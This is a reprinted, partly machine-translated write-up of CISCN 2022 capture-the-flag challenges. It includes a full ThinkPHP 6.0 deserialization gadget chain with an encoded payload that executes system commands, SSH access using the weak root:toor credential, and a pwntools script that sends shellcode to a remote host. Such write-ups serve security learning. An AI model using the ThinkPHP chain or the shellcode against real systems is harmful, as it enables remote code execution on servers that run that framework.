Original link: https://5ime.cn/ciscn-2022.html
I feel that this year’s questions are simpler than last year’s, and the three passwords are unexpected. A good friend helped me with 150 multiple-choice questions, and then I got off the line after six CTF questions were asked~
Misc
Sign in to the station
First, according to the stem of the question, send keywords to the public account to get the hint
Open the question environment, find the password book, and then according to the official account prompt, 7*4 numbers are the first 28 digits
Click the pure number mode to take the first 28
bits
1272685121234614783219665440
Then弼时安全到达了
:
1732 2514 1344 0356 0451 6671 0055
First get请求
start the telegraph
/send?msg=s
Then get请求
the 28
digits after modulo ten
/send?msg=2904836534674960728375375495
WEB
ezpop
tp6.0
, just search for an exp on Baidu (ThinkPHP6.0 deserialization chain audit and analysis: https://forum.butian.net/share/1168), we only need to find the deserialization point , after dirsearch
scan, it is found that there is a www.zip
file, and then there is a deserialization point in the index.php
controller
<?php namespace think { use think \ route \ Url ; abstract class Model { private $lazySave ; private $exists ; protected $withEvent ; protected $table ; private $data ; private $force ; public function __construct ( ) { $this ->lazySave = true ; $this ->withEvent = false ; $this ->exists = true ; $this ->table = new Url (); $this ->force = true ; $this ->data = [ "1" ]; } }} namespace think \ model { use think \ Model ; class Pivot extends Model { function __construct ( ) { parent :: __construct (); } } $b = new Pivot (); echo urlencode ( serialize ( $b ));} namespace think \ route { use think \ Middleware ; use think \ Validate ; class Url { protected $url ; protected $domain ; protected $app ; protected $route ; public function __construct ( ) { $this ->url = 'a:' ; $this ->domain = "<?php system('cat /flag.txt');?>" ; $this ->app = new Middleware (); $this ->route = new Validate (); } }} namespace think { use think \ view \ driver \ Php ; class Validate { public function __construct ( ) { $this ->type[ 'getDomainBind' ] = [ new Php (), 'display' ]; } } class Middleware { public function __construct ( ) { $this ->request = "sp4c1ous" ; } }} namespace think \ view \ driver { class Php { public function __construct () { } }}
payload
// ?s=index/test或者/index.php/index/testa=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D
password
Challenge code-based two-way authentication & challenge code-based two-way authentication 2
ssh connect directly to find
the search flag
find / -name 'flag*'
cat /root/cube-shell/instance/flag_server/flag*
The first flag is基于挑战码的双向认证
second one is基于挑战码的双向认证2
Two-way authentication based on challenge code3
Unexpected, account password: root:toor
weak password
cat /root/cube-shell/instance/flag_server/flag*
PWN
login-nomal
Navigate to main
> sub_FFD()
It’s obviously an execution of sc
.
from pwn import *context.arch = 'amd64' context.log_level = 'debug' # p = process('./login') p = remote( '123.56.87.204' , 36979 )pl = "msg:ro0tt\nopt:1\n" p.sendlineafter( ">>" , pl)key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000" pl = "msg:" + key + "\nopt:2\n" p.sendlineafter( ">>" , pl)p.interactive()
This article is reprinted from: https://5ime.cn/ciscn-2022.html
This site is for inclusion only, and the copyright belongs to the original author.